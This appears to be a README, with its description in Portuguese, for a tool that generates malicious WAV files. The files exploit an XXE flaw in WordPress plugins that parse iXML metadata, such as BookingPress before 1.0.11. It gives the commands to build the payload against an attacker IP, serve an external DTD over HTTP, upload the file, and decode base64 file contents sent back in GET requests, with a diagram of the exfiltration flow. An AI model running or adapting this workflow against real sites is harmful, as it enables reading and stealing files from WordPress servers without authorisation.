
A XXE payload generator
Gera arquivos WAV maliciosos que exploram vulnerabilidades XXE em plugins WordPress que processam chunks de metadados iXML (por exemplo, BookingPress < 1.0.11).
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200
# Start HTTP server
python3 -m http.server 9200
# Upload exploit.wav to target
# Monitor logs for data exfiltration
# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d
┌──────────┐ 1. Upload ┌──────────┐
│ Attacker │ ───exploit.wav──>│ Target │
└──────────┘ └──────────┘
▲ │
│ │ 2. Parse XML
│ │
│ 3. GET /xxe.dtd │
│<─────────────────────────────┘
│
│ 4. GET /?p=base64_data
│<─────────────────────────────┐
│ │
└─ Decode and read file │